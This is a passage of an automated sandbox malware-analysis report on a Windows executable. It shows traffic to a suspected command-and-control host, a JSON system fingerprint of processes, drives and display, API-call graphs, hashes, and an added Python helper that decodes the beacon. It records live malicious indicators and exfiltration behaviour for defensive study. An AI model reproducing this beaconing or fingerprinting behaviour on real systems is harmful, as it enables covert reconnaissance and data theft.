                                                          Dec 20, 2024 16:44:48.423712015 CET | 4944 bytes | OUT | Data Raw: 4d 38 64 2b 49 6f 34 6e 6b 61 47 36 38 54 36 72 34 6d 38 58 61 5a 71 65 6f 78 52 4d 78 57 33 66 55 49 39 46 74 4c 75 37 6a 69 77 6b 32 6f 53 33 64 34 52 35 74 31 49 54 2b 6d 65 6c 5c 2f 74 33 5c 2f 41 4c 4b 64 75 45 45 5c 2f 78 55 32 62 63 5c 2f
                                                          Data Ascii: M8d+Io4nkaG68T6r4m8XaZqeoxRMxW3fUI9FtLu7jiwk2oS3d4R5t1IT+mel\/t3\/ALKduEE\/xU2bc\/8AMj\/EduOf7vhBq\/K79vz4x\/D742fGXwz4n+GOu\/8ACS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4
                                                          Dec 20, 2024 16:44:48.423724890 CET | 1236 bytes | OUT | Data Raw: 49 73 61 62 30 6b 6d 54 5c 2f 57 2b 2b 66 58 72 36 66 35 50 66 50 32 66 6e 2b 48 5c 2f 41 41 53 2b 64 2b 58 39 66 4d 68 6b 5a 32 4c 75 37 37 42 5c 2f 71 5c 2f 38 41 56 57 32 66 38 5c 2f 70 5c 2f 56 6d 33 64 76 64 30 38 6c 35 50 38 5c 2f 54 76 6a
                                                          Data Ascii: Isab0kmT\/W++fXr6f5PfP2fn+H\/AAS+d+X9fMhkZ2Lu77B\/q\/8AVW2f8\/p\/Vm3dvd08l5P8\/Tvjn+lPSMbX\/cx7Mfx\/Ti1\/6\/u9Mkz5j\/8AtP8AcQen19+tZmoyPZ5h353\/AOql\/wDkr8P6UwSFvnR8v\/zz\/wCnfHpnr0p+5PnR3+SX7P8A8tf\/ACa\/p1qH5137E8v93\/q4\/wDlt\/pXf9P880HQQyN
                                                          Dec 20, 2024 16:44:48.423732996 CET | 3708 bytes | OUT | Data Raw: 2b 71 48 79 5c 2f 4d 5c 2f 76 5c 2f 38 41 62 4c 5c 2f 55 38 66 35 5c 2f 4d 30 39 66 39 79 54 33 38 7a 39 78 5c 2f 6e 67 2b 33 4e 48 79 79 4e 4d 37 70 76 66 7a 66 33 58 2b 65 33 2b 65 42 57 5a 30 44 50 4c 64 66 4f 5c 2f 76 78 5c 2f 38 41 54 4c 39
                                                          Data Ascii: +qHy\/M\/v\/8AbL\/U8f5\/M09f9yT38z9x\/ng+3NHyyNM7pvfzf3X+e3+eBWZ0DPLdfO\/vx\/8ATL9f60SNMsiQ\/wAH\/Px\/XAoSPdv2OX\/7a+365zTdvzI6Q4H+ql8z\/P5Vp7Ty\/H\/gAQx\/vJPL2RzJH9ol80\/uPO7\/AOOafJn93v8Auf5\/0W7qXcn3Ngx5v\/LvF5H+c1DHI+P7iR\/6r99df+Av65NHx+V
                                                          Dec 20, 2024 16:44:48.543116093 CET | 2472 bytes | OUT | Data Raw: 2b 58 35 70 4f 68 44 6c 6e 4a 38 36 79 5c 2f 4e 4d 76 78 65 71 53 64 4c 46 55 33 46 74 71 61 6a 75 55 31 5c 2f 75 6e 38 50 35 69 6f 4c 32 36 6a 73 62 4f 37 76 5a 75 49 62 4f 32 6e 75 70 54 6e 48 37 75 33 69 65 56 2b 54 77 50 6c 51 38 6e 70 56 72
                                                          Data Ascii: +X5pOhDlnJ86y\/NMvxeqSdLFU3FtqajuU1\/un8P5ioL26jsbO7vZuIbO2nupTnH7u3ieV+TwPlQ8npVrVbW70C31bVfEWq+DNA8M6Z8NvhB8QIPFGqa5r8eka\/q\/x38D2HxF+GXwk8MiDwdcX+ufFrWvCV7Lq9\/ollZP4Z8Nadpuo634l8X6R4cjttaur4g4w4Z4WqZfS4gzjCZXVzWs8NltLEOp7THYm8IrD4aFOnUlVx
                                                          Dec 20, 2024 16:44:48.543170929 CET | 7416 bytes | OUT | Data Raw: 68 36 73 6f 33 35 57 6a 35 44 68 66 67 7a 69 6e 6a 58 46 56 38 44 77 70 6b 65 4f 7a 33 47 59 61 4f 45 6e 57 77 32 58 30 31 56 72 77 6a 6a 38 77 77 6d 55 34 53 54 70 75 55 5a 53 56 66 4d 63 64 67 38 48 42 78 54 5c 2f 66 59 69 6b 70 57 55 72 6e 65
                                                          Data Ascii: h6so35Wj5DhfgzinjXFV8DwpkeOz3GYaOEnWw2X01Vrwjj8wwmU4STpuUZSVfMcdg8HBxT\/fYikpWUrnefCb4i6l8IviZ4E+KGjWFlqer+APFGkeLNK0\/UzONNu9R0O7jv7GDUBayQXL2T3MMX2uO2uLaeWDzI4bm2kdZ4\/1aP8AwW3\/AGh\/4fhR8ER9bLx+f5eO1r8addh0zRvh23jex+I\/wk8YeJNP+CnwR\/aI8U\/


                                                          Session ID:3
                                                          Source IP:192.168.2.5
                                                          Source Port:49742
                                                          Destination IP:185.121.15.192
                                                          Destination Port:80
                                                          PID:3148
                                                          Process:C:\Users\user\Desktop\5ZH9uXmzGP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 20, 2024 16:44:49.954622984 CET | 87 bytes | OUT | GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Dec 20, 2024 16:44:51.228024006 CET | 212 bytes | IN | HTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          Session ID:0
                                                          Source IP:192.168.2.5
                                                          Source Port:49714
                                                          Destination IP:98.85.100.80
                                                          Destination Port:443
                                                          PID:3148
                                                          Process:C:\Users\user\Desktop\5ZH9uXmzGP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-20 15:44:42 UTC | 52 bytes | OUT | GET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-20 15:44:43 UTC | 224 bytes | IN | HTTP/1.1 200 OK
                                                          Date: Fri, 20 Dec 2024 15:44:42 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-20 15:44:43 UTC | 31 bytes | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}
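The sessions above together show the sample's check-in: it asks httpbin.org/ip for its public address (8.46.123.189, the session at 15:44:42 UTC), then sends a JSON fingerprint that carries that same address, a Unix timestamp, CPU and RAM counts, drive sizes, display geometry, a recent-files count and the running-process list, which lines up with the Process32FirstW, Process32NextW and GetLogicalDrives calls in the execution graph further down. The sample also sends its GETs without a User-Agent header. The following Python is an added analyst helper, not code from the report or from the sample: it turns a "Data Raw" hex line back into bytes, parses the fingerprint into a summary, and checks a captured request for the missing header. The sample input is constructed from the visible, untruncated prefix of the report's JSON body (the report's copy is truncated), and the helper names and field names it derives are mine.

```python
"""Decode and triage the system-fingerprint beacon and the User-Agent-less
HTTP requests captured in the sandbox report above.

Added analyst helper, not code from the report or the sample. SAMPLE_JSON is
constructed from the leading, untruncated part of the report's Data Ascii line
and closed so that it parses; the report's own copy is cut off mid-list.
"""
import json
import re
from datetime import datetime, timezone

# Constructed: visible prefix of the report's beacon body, with the process
# list closed after five entries.
SAMPLE_JSON = (
    '{ "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, '
    '"Num_ram": 7, "drivers": [ { "name": "C:\\\\", "all": 223.0, "free": 168.0 } ], '
    '"Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, '
    '"recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, '
    '{ "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, '
    '{ "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 } ] }'
)

# Rendered the way the report prints it: "Data Raw:" then space-separated hex bytes.
SAMPLE_DATA_RAW_LINE = "Data Raw: " + " ".join(f"{b:02x}" for b in SAMPLE_JSON.encode())

# The GET the sample sends to httpbin.org, as shown in the report (no User-Agent).
SAMPLE_GET = "GET /ip HTTP/1.1\r\nHost: httpbin.org\r\nAccept: */*\r\n\r\n"


def decode_data_raw(line: str) -> bytes:
    """Turn a 'Data Raw: 7b 20 22 ...' report line back into bytes.

    A trailing '[TRUNCATED]' marker is dropped and only two-digit hex tokens
    are read, so a truncated line still decodes to its visible prefix.
    """
    body = line.split("Data Raw:", 1)[-1].replace("[TRUNCATED]", "")
    hex_pairs = re.findall(r"\b[0-9a-fA-F]{2}\b", body)
    return bytes(int(h, 16) for h in hex_pairs)


def parse_fingerprint(raw: bytes) -> dict:
    """Parse the beacon body and summarise what the sample sends home."""
    fp = json.loads(raw.decode("utf-8"))
    procs = fp.get("processes", [])
    return {
        "external_ip": fp["ip"],
        # current_time is a Unix timestamp transmitted as a string
        "beacon_time_utc": datetime.fromtimestamp(int(fp["current_time"]), tz=timezone.utc),
        "cpus": fp["Num_processor"],
        "ram_gb": fp["Num_ram"],
        "disks": [(d["name"], d["all"], d["free"]) for d in fp.get("drivers", [])],
        "display": (fp["Num_displays"], fp["resolution_x"], fp["resolution_y"]),
        "recent_files": fp["recent_files"],
        "process_names": [p["name"] for p in procs],
        "process_count": len(procs),
    }


def lacks_user_agent(request: str) -> bool:
    """True if a raw HTTP request carries no User-Agent header, the behaviour
    the report's 'HTTP GET or POST without a user agent' signature flags."""
    head = request.split("\r\n\r\n", 1)[0]
    headers = head.split("\r\n")[1:]  # drop the request line
    return not any(h.lower().startswith("user-agent:") for h in headers)


if __name__ == "__main__":
    summary = parse_fingerprint(decode_data_raw(SAMPLE_DATA_RAW_LINE))
    for key, value in summary.items():
        print(f"{key:16} {value}")
    print("GET /ip without User-Agent:", lacks_user_agent(SAMPLE_GET))
```

The beacon's "current_time" (1734709482) decodes to 2024-12-20 15:44:42 UTC, the same second as the httpbin.org request in the session above, so the fingerprint is assembled immediately after the public address is known; the "ip" field is simply the "origin" value httpbin returned.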



                                                          Target ID:1
                                                          Start time:10:44:36
                                                          Start date:20/12/2024
                                                          Path:C:\Users\user\Desktop\5ZH9uXmzGP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\5ZH9uXmzGP.exe"
                                                          Imagebase:0x140000
                                                          File size:4'485'120 bytes
                                                          MD5 hash:35E2C99A2FED28F4148EF7F4C1431DF4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:10:44:50
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1112
                                                          Imagebase:0xef0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:0.2%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:8
                                                            Total number of Limit Nodes:0
                                                            Execution graph rendered in the report (recoverable node list, not an image):
                                                            6f20802 Process32FirstW -> 6f20837
                                                            6f30343 -> 6f30350 Process32NextW -> 6f3037c
                                                            6ef0438 -> 6ef0420 GetLogicalDrives -> 6ef0456
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d903c3e948e9387f8c1802253a1d1b6230887265c93832cb403044d21380bac7
                                                            • Instruction ID: 96efdea29c105208acd2a733077454c905180f2ed7db368c40f640451a4f5164
                                                            • Opcode Fuzzy Hash: d903c3e948e9387f8c1802253a1d1b6230887265c93832cb403044d21380bac7
                                                            • Instruction Fuzzy Hash: 14316DEB20C314BDB7C2D9826B54AFB572ED2DA730B38A427F807D4502E2941F4B10B5

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: 6ae5d8e51795e430640ea24571c03a45830e2219623c553b3d92dcc58274e9ab
                                                            • Instruction ID: f29d827cadc385aa63eada3c651575d655428204d84c37f984fdaa2115f2cae4
                                                            • Opcode Fuzzy Hash: 6ae5d8e51795e430640ea24571c03a45830e2219623c553b3d92dcc58274e9ab
                                                            • Instruction Fuzzy Hash: 00D104EB18C133BDB38285456F54AFB6B6EE6D77303308426F407D6602EA940E8A4DB1

                                                            Control-flow Graph

                                                            Control-flow graph rendered in the report (node list, not an image): entry 6f2061d; blocks 6f2061d-6f20fe9 with a loop over 6f206af-6f206ea; Process32FirstW called in block 6f20812-6f20827; then calls to 6f20961, 6f20b07, 6f20d62 and 6f20dd4.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: a8a603fa83f6b5d1cc249e5631db6e08be7445e4968cf5c035d277817d319294
                                                            • Instruction ID: b7eef32a32d224f78a76d5457a632af28e8068fb7bb10f119f20f85d017ef857
                                                            • Opcode Fuzzy Hash: a8a603fa83f6b5d1cc249e5631db6e08be7445e4968cf5c035d277817d319294
                                                            • Instruction Fuzzy Hash: E8D1D3EB18C133BDB3C285456B54AFBAB6EE6D77307308426F407D6602EA940E895DF1

                                                            Control-flow Graph

                                                            Control-flow graph rendered in the report (node list, not an image): entry 6f20630; blocks 6f20630-6f20fe9 with a loop over 6f206af-6f206ea; Process32FirstW called in block 6f20812-6f20827; then calls to 6f20961, 6f20b07, 6f20d62 and 6f20dd4.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: b3eacc3cf86b5202a6172839c60d4dbbea034e29d1874634796a1546c7b21867
                                                            • Instruction ID: 70c24bfcbd7dc9281600f66322a6b68fdbeb546a68df1250fe36258b8595bc08
                                                            • Opcode Fuzzy Hash: b3eacc3cf86b5202a6172839c60d4dbbea034e29d1874634796a1546c7b21867
                                                            • Instruction Fuzzy Hash: 88D1F3EB18C133BDB3C285456B54AFBAB6EE6D77307308426F407D6602EA940E895DF1

                                                            Control-flow Graph

                                                            Control-flow graph rendered in the report (node list, not an image): entry 6f2064c; blocks 6f2064c-6f20fe9 with a loop over 6f206af-6f206ea; Process32FirstW called in block 6f20812-6f20827; then calls to 6f20961, 6f20b07, 6f20d62 and 6f20dd4.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: 3003bdf7a9811b343451317bff901307b55ae9c1c3c288c357954325ea0ac601
                                                            • Instruction ID: a1f9290f5688e09c4f3c8d7048f02fdffe159f686099e4bcaf26867d053bdb1f
                                                            • Opcode Fuzzy Hash: 3003bdf7a9811b343451317bff901307b55ae9c1c3c288c357954325ea0ac601
                                                            • Instruction Fuzzy Hash: 64D1F5EB18C133BDB3C285856B54AFB6B6EE6C67307308426F407D6602EB940E895DF1

                                                            Control-flow Graph

                                                            Control-flow graph rendered in the report (node list, not an image): entry 6f20674; blocks 6f2065e-6f20fe9 with a loop over 6f206af-6f206ea; Process32FirstW called in block 6f20812-6f20827; then calls to 6f20961, 6f20b07, 6f20d62 and 6f20dd4.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: 88f160607dc7685370c7b43250e05a47c629c92b4296508774b2ae92c4002f49
                                                            • Instruction ID: f221174693ed49aa5f7d1d55fcd5e2e13f173c05827db0ca4c70ba33a75ffc0b
                                                            • Opcode Fuzzy Hash: 88f160607dc7685370c7b43250e05a47c629c92b4296508774b2ae92c4002f49
                                                            • Instruction Fuzzy Hash: BFD1E3EB18D133BDB3C285456B54AF7AB6EE6C77307308426F407D6602EA940E895DF1

                                                            Control-flow Graph

                                                            Control-flow graph rendered in the report (node list, not an image): entry 6f20686; blocks 6f20686-6f20fe9 with a loop over 6f206af-6f206ea; Process32FirstW called in block 6f20812-6f20827; then calls to 6f20961, 6f20b07, 6f20d62 and 6f20dd4.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: 17a8fc2950027ef9fa48e6262fe533c1c1199198e45fc834473bdc20cbf72047
                                                            • Instruction ID: a36d095beb8011571f3a4aceb2e22b103daa31ceecbbe5601dad6d39594348aa
                                                            • Opcode Fuzzy Hash: 17a8fc2950027ef9fa48e6262fe533c1c1199198e45fc834473bdc20cbf72047
                                                            • Instruction Fuzzy Hash: 6EC1D3EB18C133BDB3C285856B54AFB6B6EE6D67307308426F407D6602EB940E895DB1

                                                            Control-flow Graph

                                                            Control-flow graph rendered in the report (node list, not an image): entry 6f206ab; blocks 6f206ab-6f20fe9 with a loop over 6f206ad-6f206ea; Process32FirstW called in block 6f20812-6f20827; then calls to 6f20961, 6f20b07, 6f20d62 and 6f20dd4.
                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: 185e878ea0a683e6ac67226f1843f976a84637a93de4d278c2115e59607d7cf3
                                                            • Instruction ID: f62f8b3cd8cd3b951ea3e7473d015e150e0703d4649749fa1891c0a65d6d95ce
                                                            • Opcode Fuzzy Hash: 185e878ea0a683e6ac67226f1843f976a84637a93de4d278c2115e59607d7cf3
                                                            • Instruction Fuzzy Hash: C8C1D2EB18C133BDB382C5856B54AFBAB6EE2D67307308426F407D6602EA944E495DF1

                                                            Control-flow Graph

                                                            Control-flow graph rendered in the report (node list, not an image): entry 6f206d6; blocks 6f206ad-6f20fe9 with a loop over 6f206af-6f206ea; Process32FirstW called in block 6f20812-6f20827; then calls to 6f20961, 6f20b07, 6f20d62 and 6f20dd4.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 0-1118756197
                                                            • Opcode ID: cd6bf4592dd727ad9c03b90bfab68271bd9fe1f511b9711101b65d42c2bb1c7b
                                                            • Instruction ID: b0138e7f4eaedb0ec0c5970941796d6937293a224dbbd749794f3b048cb388c2
                                                            • Opcode Fuzzy Hash: cd6bf4592dd727ad9c03b90bfab68271bd9fe1f511b9711101b65d42c2bb1c7b
                                                            • Instruction Fuzzy Hash: 5BC1D3EB18C133BDB3C285856B54AFBA76EE6D67307308426F407D6602EB940E495DB1

                                                            Control-flow Graph

                                                            Control-flow graph rendered in the report (node list, not an image): entry 6f20710; blocks 6f20710-6f20fe9 with a loop over 6f20726-6f20745; Process32FirstW called in block 6f20812-6f20827; then calls to 6f20961, 6f20b07, 6f20d62 and 6f20dd4.
                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: 5c075d01bb255ca76f3d2c960bef1e57e1c353ce92485884c410d65d190a37a8
                                                            • Instruction ID: 2e00a2aa8b5e0cad90375154d01fa2e2c114f4ddb2fbef8ac28f35f3e16ea9a2
                                                            • Opcode Fuzzy Hash: 5c075d01bb255ca76f3d2c960bef1e57e1c353ce92485884c410d65d190a37a8
                                                            • Instruction Fuzzy Hash: 4FC103EB18D133BDB38285456B54AFBAB6EE6C77307308436F407D6A02EB940E495DB1

                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: 6f661e44f646b1a7911a205d00f1eb546f4e0252e9eb46c0004405967132d3f3
                                                            • Instruction ID: 5c8b6c05339c5c05d03be9039a9f147808053e8eaf7cb292ef54a68b0f4045df
                                                            • Opcode Fuzzy Hash: 6f661e44f646b1a7911a205d00f1eb546f4e0252e9eb46c0004405967132d3f3
                                                            • Instruction Fuzzy Hash: 29C1F1EB18C133BDB3C285856B54AFBAB6EE6D77307308426F407D6602EAD40E495DB1

                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: d072e9144e7944bae845ad8ef7b46484d13681973aa7dfd4c353224a91e8afbb
                                                            • Instruction ID: ccb62921e869606decbd5fd3fe475aeb8e467d012a9b7dbc519c2709e1b0839f
                                                            • Opcode Fuzzy Hash: d072e9144e7944bae845ad8ef7b46484d13681973aa7dfd4c353224a91e8afbb
                                                            • Instruction Fuzzy Hash: 81B1D1EB18C132BDB3C285856B54AFBA76EE2D67307308436F407D6602EAD44E895DB1

                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: f0141db529f4a69ace0d5d6cefe9c4b3c50632d73ca7f1a53725d7cc93f02e88
                                                            • Instruction ID: 6001172864487334aee403fdfa5bad439be8f916641aba4ec7b5a1cfdff48778
                                                            • Opcode Fuzzy Hash: f0141db529f4a69ace0d5d6cefe9c4b3c50632d73ca7f1a53725d7cc93f02e88
                                                            • Instruction Fuzzy Hash: AEB1D0EB18C132BDB3C285856B54AFBA76EE6D67303308436F407D6602EAD40E895DB1

                                                            Control-flow Graph (node: basic block address range -> successor nodes)
                                                            • 1241: 6f207ea-6f207f3 -> 1242, 1243
                                                            • 1242: 6f20792-6f207e5 -> 1247
                                                            • 1243: 6f207f5-6f207f7 -> 1242, 1245
                                                            • 1245: 6f207f9-6f207fb -> 1247
                                                            • 1247: 6f207fd -> 1249
                                                            • 1249: 6f20812-6f20827 Process32FirstW -> 1250
                                                            • 1250: 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4
                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: cf090124f7f87ef73d147d23112073e2679efa0072252d8d088e066748e5e8fc
                                                            • Instruction ID: 00cc74999453857ac5b19e7e4aad483763995d493c05709c338c04629981a9e2
                                                            • Opcode Fuzzy Hash: cf090124f7f87ef73d147d23112073e2679efa0072252d8d088e066748e5e8fc
                                                            • Instruction Fuzzy Hash: BAB101EB18C133BDB3C285856B54AFBA76EE2D67303308426F407D6602EA940E4A5DF1

                                                            Control-flow Graph (node: basic block address range -> successor nodes)
                                                            • 1332: 6f207be-6f207c6 -> 1333, 1334
                                                            • 1333: 6f207c8-6f207cc -> 1334
                                                            • 1334: 6f207cd-6f207fd -> 1337
                                                            • 1337: 6f20812-6f20827 Process32FirstW -> 1338
                                                            • 1338: 6f20837-6f20fe9 call 6f20961 call 6f20b07 call 6f20d62 call 6f20dd4
                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f20000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: PR$PR$ZX
                                                            • API String ID: 2623510744-1118756197
                                                            • Opcode ID: 5fa0d9fd73abf0d5a6991bffcb9ab4e666ab685988d218da21c4a65f6f48d6fd
                                                            • Instruction ID: 4e2d9b36746816365c60708e6fb6f715caa0f8394af3f9fe9d2d67555180eb1f
                                                            • Opcode Fuzzy Hash: 5fa0d9fd73abf0d5a6991bffcb9ab4e666ab685988d218da21c4a65f6f48d6fd
                                                            • Instruction Fuzzy Hash: 3FB1E1EB18C133BDB3C2C5856B54AFBA76EE2D67303308426F407D6602EA944E895DF1

                                                            APIs
                                                            • Process32FirstW.KERNEL32(06F206E7,?,000048BD), ref: 06F20816
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416653299.0000000006F20000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
